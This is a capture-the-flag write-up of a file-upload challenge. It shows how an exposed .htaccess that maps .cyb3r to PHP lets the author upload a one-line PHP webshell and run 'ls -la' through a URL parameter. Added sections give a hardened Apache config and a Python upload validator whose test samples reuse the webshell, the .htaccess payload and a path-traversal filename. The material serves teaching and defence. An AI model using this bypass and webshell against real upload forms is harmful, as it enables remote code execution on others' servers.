noxCTF – MyFileUploader writeup

We start the challenge with this URI:

http://chal.noxale.com:8079/

The page is a plain file uploader. I tried to upload a webshell and found that the server only accepts files carrying one of these extensions:

JPG, PNG, GIF

I tried playing with the extension by giving the file a "double extension" like this:
test.jpg.php

That didn't work: the site strips the .php extension, but it does not strip any other trailing extension. So a file can be uploaded with any extension except .php.
When I uploaded a legitimate image it was saved under /uploads/ with its original filename.

The uploads route has directory listing enabled. Inside it there is another directory called "Don't open", and inside that one there is a .htaccess file.

.htaccess is a per-directory configuration file for the Apache HTTP Server.

When Apache serves a directory that contains one (and the main server config permits overrides there via AllowOverride), it reads the file and applies its directives to that directory and everything below it. This lets the owner of a directory change handlers, MIME types, directory options and similar settings without touching the main server configuration.

Normally you shouldn't be able to see this file, but here it is (intentionally) exposed through the directory listing, which is great for us.

The file looks like this:

Options +Indexes
AddType application/x-httpd-php .cyb3r

From this we learn two things: Options +Indexes is what turned on the directory listing we saw, and AddType maps the .cyb3r extension to the PHP handler, so any uploaded .cyb3r file is executed as PHP.
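Added example, not part of the writeup or the challenge: the two-line .htaccess above next to the server-config block that would have closed this hole. The directory path and the assumption that PHP runs through mod_php are mine.

```apacheconf
# The .htaccess the challenge left in "Don't open" (as listed on the page).
# "Options +Indexes" turns on the directory listing we saw; "AddType" makes
# mod_php execute .cyb3r files as PHP.
Options +Indexes
AddType application/x-httpd-php .cyb3r

# Hardened counterpart. This belongs in the main server config, not in a
# .htaccess: an uploader who can drop a .htaccess into the directory owns
# that file. Path is assumed.
<Directory "/var/www/html/uploads">
    # Ignore every .htaccess below this point, whatever an uploader writes.
    AllowOverride None
    # No listing, no CGI.
    Options -Indexes -ExecCGI
    # Serve everything here as a static file, whatever its extension.
    SetHandler default-handler
    # mod_php only: switch the engine off and forbid re-enabling it per dir.
    php_admin_flag engine off
    # Never serve dotfiles such as .htaccess, even if one lands here.
    <FilesMatch "^\.ht">
        Require all denied
    </FilesMatch>
</Directory>
```

Two caveats. Apache does not allow a comment on the same line as a directive, which is why the comments above sit on their own lines. And with php-fpm the PHP handler is usually set by a server-level FilesMatch, which is merged after Directory sections and would override SetHandler here; in that setup exclude the uploads path there as well, or better, store uploads outside the document root and serve them through a script that never executes them.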
So the next attempt is to upload a file named test.jpg.cyb3r with this content:

<?php
system($_GET["0"]);

This is an ugly webshell, but at this point I only wanted to confirm code execution.
The file uploaded successfully!
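Added example, not code from the writeup or the challenge: a model of the filter behaviour described above (.php stripped, other trailing extensions kept) next to a hardened validator that would have rejected test.jpg.cyb3r. The challenge's server-side code is not on the page, so challenge_style_check is an assumed reconstruction of the observed behaviour, and the sample filenames and byte strings are constructed.

```python
"""Upload-filter bypass from the writeup, modelled beside a hardened check.

challenge_style_check is an ASSUMED reconstruction of the challenge filter
(its real source is not on the page).  hardened_check is the validator a
reviewer would ask for instead.
"""
import os
import re
import secrets
from typing import Optional

# The three extensions the challenge accepts.
ALLOWED_IMAGE_EXTS = {"jpg", "png", "gif"}

# File signatures ("magic bytes") of the three allowed formats.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def challenge_style_check(filename: str) -> Optional[str]:
    """ASSUMED reconstruction of the challenge filter.

    Strips every '.php' from the name, then accepts it if any dotted segment
    after the base name is an allowed image extension.  Returns the name the
    file would be stored under, or None if rejected.
    """
    stripped = re.sub(r"\.php", "", filename, flags=re.IGNORECASE)
    segments = stripped.lower().split(".")[1:]
    if any(seg in ALLOWED_IMAGE_EXTS for seg in segments):
        return stripped          # client-supplied name is reused as-is
    return None


def hardened_check(filename: str, data: bytes) -> Optional[str]:
    """Allowlist the LAST extension only, sniff the content, and never reuse
    the client-supplied name.  Returns a random storage name, or None."""
    base = os.path.basename(filename.replace("\\", "/"))
    # Dotfiles (.htaccess!) and names without an extension are rejected outright.
    if not base or base.startswith(".") or "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_IMAGE_EXTS:
        return None
    # Content must match the claimed type.  Magic bytes are forgeable, so this
    # is defence in depth; the allowlist plus a non-executing uploads directory
    # is the real fix.
    if not data.startswith(IMAGE_MAGIC[ext]):
        return None
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads: (client filename, first bytes of the content).
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
PHP_SHELL = b'<?php system($_GET["0"]);'

SAMPLES = [
    ("cat.png", PNG_HEADER),
    ("test.jpg.php", PHP_SHELL),     # stripped to test.jpg by the modelled filter
    ("test.jpg.cyb3r", PHP_SHELL),   # the bypass used in the writeup
    (".htaccess", b"AddType application/x-httpd-php .cyb3r\n"),
    ("../../evil.gif", b"GIF89a"),   # the modelled filter keeps the path intact
]


def compare(samples=SAMPLES):
    """Return {filename: (challenge_result, hardened_result)} for the samples."""
    return {name: (challenge_style_check(name), hardened_check(name, data))
            for name, data in samples}


if __name__ == "__main__":
    for name, (weak, strong) in compare().items():
        print(f"{name:22} modelled filter -> {weak!s:16} hardened -> {strong}")
```

The point of the hardened version is that it never asks "does an allowed extension appear somewhere in the name"; it takes the last extension, rejects anything not on the allowlist, and throws the client's filename away, so neither a second extension nor a path component ever reaches the filesystem.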

Now I can browse to

http://chal.noxale.com:8079/uploads/test.jpg.cyb3r?0=ls -la

The command ran on the server and its output came back in the response (the browser URL-encodes the space in the query string as %20).

I got back a list of files and one directory: 7H3-FL4G-1S-H3r3

Listing that directory returns a single file name carrying the flag value:

noxCTF{N3V3R_7RU57_07H3R5}

This was really a 5-minute challenge 🙂
